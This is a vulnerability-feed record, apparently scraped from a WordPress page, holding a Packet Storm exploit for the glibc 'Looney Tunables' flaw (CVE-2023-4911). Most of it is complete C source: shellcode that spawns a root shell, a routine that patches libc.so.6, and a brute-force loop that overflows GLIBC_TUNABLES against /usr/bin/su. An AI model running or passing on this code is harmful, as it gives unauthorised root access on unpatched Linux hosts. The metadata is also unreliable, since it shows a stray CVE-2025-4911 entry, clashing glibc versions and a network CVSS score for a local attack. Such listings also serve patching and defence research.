{“lastseen”:”2026-02-11T17:48:02″,”description”:”This is a local privilege escalation exploit for CVE-2023-4911, also known as \\”Looney Tunables\\”, caused by a buffer overflow in the glibc dynamic loader’s environment variable parsing logic. The vulnerability is triggered by crafting a maliciously long…”,”published”:”2026-02-11T00:00:00″,”modified”:”2026-02-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 glibc 2.38 Buffer Overflow”,”source”:””,”references”:””,”id”:”PACKETSTORM:215376″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-4911″,”CVE-2025-4911″],”sourceData”:”# Exploit Title: glibc 2.38 – Buffer Overflow \\n # Google Dork: N\/A\\n # Date: 2025-10-08\\n # Exploit Author: Beatriz Fresno Naumova\\n # Vendor Homepage: https:\/\/www.gnu.org\/software\/libc\/\\n # Software Link: https:\/\/ftp.gnu.org\/gnu\/libc\/glibc-2.35.tar.gz\\n # Version: glibc 2.35 (specifically 2.35-0ubuntu3.3 on Ubuntu 22.04.3 LTS)\\n # Tested on: Ubuntu 22.04.3 LTS (glibc 2.35-0ubuntu3.3)\\n # CVE : CVE-2023-4911\\n \\n # Description:\\n Looney Tunables – glibc GLIBC_TUNABLES Environment Variable Buffer Overflow \\n # This is a local privilege escalation exploit for CVE-2023-4911, also known as\\n # \\”Looney Tunables\\”, caused by a buffer overflow in the glibc dynamic loader’s\\n # environment variable parsing logic. The vulnerability is triggered by crafting\\n # a maliciously long GLIBC_TUNABLES string which corrupts internal loader state,\\n # allowing control over DT_RPATH and arbitrary shared object loading.\\n #\\n # This PoC creates a patched version of libc.so.6 with embedded shellcode and\\n # abuses the loader to execute arbitrary code as root by invoking \/usr\/bin\/su\\n # with a malicious environment.\\n #\\n \\n \\n \\n \\n #define _GNU_SOURCE\\n #include \\u003cstdio.h\\u003e\\n #include \\u003cstdlib.h\\u003e\\n #include \\u003cstring.h\\u003e\\n #include \\u003cstdint.h\\u003e\\n #include \\u003cunistd.h\\u003e\\n #include \\u003cerrno.h\\u003e\\n #include \\u003cfcntl.h\\u003e\\n #include \\u003ctime.h\\u003e\\n #include \\u003csys\/stat.h\\u003e\\n #include \\u003csys\/types.h\\u003e\\n #include \\u003csys\/resource.h\\u003e\\n #include \\u003csys\/wait.h\\u003e\\n #include \\u003celf.h\\u003e\\n \\n #define FILL_SIZE 0xd00\\n #define BOF_SIZE 0x600\\n #define MAX_ENVP 0x1000\\n \\n \/\/ shellcode generado con pwntools\\n const unsigned char shellcode[] = {\\n 0x48, 0x31, 0xff, \/\/ xor rdi,rdi\\n 0x6a, 0x69, \/\/ push 0x69 ; syscall setuid\\n 0x58, \/\/ pop rax\\n 0x0f, 0x05, \/\/ syscall\\n 0x48, 0x31, 0xff, \/\/ xor rdi,rdi\\n 0x6a, 0x6a, \/\/ push 0x6a ; syscall setgid\\n 0x58, \/\/ pop rax\\n 0x0f, 0x05, \/\/ syscall\\n 0x48, 0x31, 0xd2, \/\/ xor rdx, rdx\\n 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, \\n 0x2f, 0x73, 0x68, 0x00, \/\/ mov rbx, \\”\/bin\/sh\\”\\n 0x53, \/\/ push rbx\\n 0x48, 0x89, 0xe7, \/\/ mov rdi, rsp\\n 0x50, \/\/ push rax\\n 0x57, \/\/ push rdi\\n 0x48, 0x89, 0xe6, \/\/ mov rsi, rsp\\n 0xb0, 0x3b, \/\/ mov al, 0x3b\\n 0x0f, 0x05 \/\/ syscall\\n };\\n \\n int64_t time_us() {\\n struct timespec tms;\\n if (clock_gettime(CLOCK_REALTIME, \\u0026tms)) return -1;\\n int64_t micros = tms.tv_sec * 1000000;\\n micros += tms.tv_nsec \/ 1000;\\n if (tms.tv_nsec % 1000 \\u003e= 500) ++micros;\\n return micros;\\n }\\n \\n void patch_libc() {\\n FILE *f = fopen(\\”\/lib\/x86_64-linux-gnu\/libc.so.6\\”, \\”rb\\”);\\n if (!f) { perror(\\”fopen\\”); exit(1); }\\n \\n fseek(f, 0, SEEK_END);\\n long size = ftell(f);\\n rewind(f);\\n \\n unsigned char *data = malloc(size);\\n if (fread(data, 1, size, f) != size) {\\n perror(\\”fread\\”);\\n exit(1);\\n }\\n fclose(f);\\n \\n Elf64_Ehdr *ehdr = (Elf64_Ehdr *)data;\\n Elf64_Shdr *shdr = (Elf64_Shdr *)(data + ehdr-\\u003ee_shoff);\\n Elf64_Sym *symtab = NULL;\\n char *strtab = NULL;\\n \\n for (int i = 0; i \\u003c ehdr-\\u003ee_shnum; ++i) {\\n if (shdr[i].sh_type == SHT_SYMTAB) {\\n symtab = (Elf64_Sym *)(data + shdr[i].sh_offset);\\n strtab = (char *)(data + shdr[shdr[i].sh_link].sh_offset);\\n break;\\n }\\n }\\n \\n if (!symtab || !strtab) {\\n fprintf(stderr, \\”[-] Failed to find symtab\\\\n\\”);\\n exit(1);\\n }\\n \\n Elf64_Addr target_addr = 0;\\n for (int i = 0; i \\u003c shdr-\\u003esh_size \/ sizeof(Elf64_Sym); ++i) {\\n if (strcmp(\\u0026strtab[symtab[i].st_name], \\”__libc_start_main\\”) == 0) {\\n target_addr = symtab[i].st_value;\\n break;\\n }\\n }\\n \\n if (!target_addr) {\\n fprintf(stderr, \\”[-] Could not find __libc_start_main\\\\n\\”);\\n exit(1);\\n }\\n \\n \/\/ patch shellcode at the symbol location\\n memcpy(data + target_addr, shellcode, sizeof(shellcode));\\n \\n f = fopen(\\”.\/libc.so.6\\”, \\”wb\\”);\\n if (!f) { perror(\\”fopen (write)\\”); exit(1); }\\n fwrite(data, 1, size, f);\\n fclose(f);\\n \\n free(data);\\n printf(\\”[+] Patched libc.so.6 written.\\\\n\\”);\\n }\\n \\n int main(void) {\\n char filler[FILL_SIZE], kv[BOF_SIZE], filler2[BOF_SIZE + 0x20], dt_rpath[0x20000];\\n char *argv[] = {\\”\/usr\/bin\/su\\”, \\”–help\\”, NULL};\\n char *envp[MAX_ENVP] = { NULL };\\n \\n \/\/ Create directory and patched libc if not present\\n if (mkdir(\\”\\\\\\”\\”, 0755) == 0) {\\n patch_libc();\\n int sfd = open(\\”.\/libc.so.6\\”, O_RDONLY);\\n int dfd = open(\\”\\\\\\”\/libc.so.6\\”, O_CREAT | O_WRONLY, 0755);\\n char buf[0x1000];\\n int len;\\n while ((len = read(sfd, buf, sizeof(buf))) \\u003e 0) {\\n write(dfd, buf, len);\\n }\\n close(sfd); close(dfd);\\n }\\n \\n memset(filler, ‘F’, sizeof(filler)); filler[sizeof(filler)-1] = ‘\\\\0’;\\n strcpy(filler, \\”GLIBC_TUNABLES=glibc.malloc.mxfast=\\”);\\n \\n memset(kv, ‘A’, sizeof(kv)); kv[sizeof(kv)-1] = ‘\\\\0’;\\n strcpy(kv, \\”GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=\\”);\\n \\n memset(filler2, ‘F’, sizeof(filler2)); filler2[sizeof(filler2)-1] = ‘\\\\0’;\\n strcpy(filler2, \\”GLIBC_TUNABLES=glibc.malloc.mxfast=\\”);\\n \\n for (int i = 0; i \\u003c MAX_ENVP; i++) envp[i] = \\”\\”;\\n envp[0] = filler;\\n envp[1] = kv;\\n envp[0x65] = \\”\\”;\\n envp[0x65 + 0xb8] = \\”\\\\x30\\\\xf0\\\\xff\\\\xff\\\\xfd\\\\x7f\\”;\\n envp[0xf7f] = filler2;\\n \\n for (int i = 0; i \\u003c sizeof(dt_rpath); i += 8) {\\n *(uintptr_t *)(dt_rpath + i) = -0x14ULL;\\n }\\n dt_rpath[sizeof(dt_rpath) – 1] = ‘\\\\0’;\\n for (int i = 0; i \\u003c 0x2f; i++) {\\n envp[0xf80 + i] = dt_rpath;\\n }\\n envp[0xffe] = \\”AAAA\\”;\\n \\n setrlimit(RLIMIT_STACK, \\u0026(struct rlimit){RLIM_INFINITY, RLIM_INFINITY});\\n \\n int pid;\\n for (int ct = 1;; ct++) {\\n if (ct % 100 == 0) printf(\\”try %d\\\\n\\”, ct);\\n \\n if ((pid = fork()) \\u003c 0) {\\n perror(\\”fork\\”); break;\\n } else if (pid == 0) {\\n execve(argv[0], argv, envp);\\n perror(\\”execve (child)\\”); exit(1);\\n } else {\\n int wstatus;\\n int64_t st = time_us(), en;\\n wait(\\u0026wstatus);\\n en = time_us();\\n \\n if (!WIFSIGNALED(wstatus) \\u0026\\u0026 en – st \\u003e 1000000) {\\n printf(\\”[+] Exploit likely succeeded!\\\\n\\”);\\n break;\\n }\\n }\\n }\\n \\n return 0;\\n }”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215376″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:L\/I:L\/A:L”,”baseScore”:7.3,”baseSeverity”:”HIGH”,”attackVector”:”NETWORK”,”attackComplexity”:”LOW”,”privilegesRequired”:”NONE”,”userInteraction”:”NONE”,”scope”:”UNCHANGED”,”confidentialityImpact”:”LOW”,”integrityImpact”:”LOW”,”availabilityImpact”:”LOW”}},”href”:”https:\/\/packetstorm.news\/files\/id\/215376\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-11T17:48:02″,”description”:”This is a local privilege escalation exploit for CVE-2023-4911, also known as \\”Looney Tunables\\”, caused by a buffer overflow in the glibc dynamic loader’s environment…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-40489","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n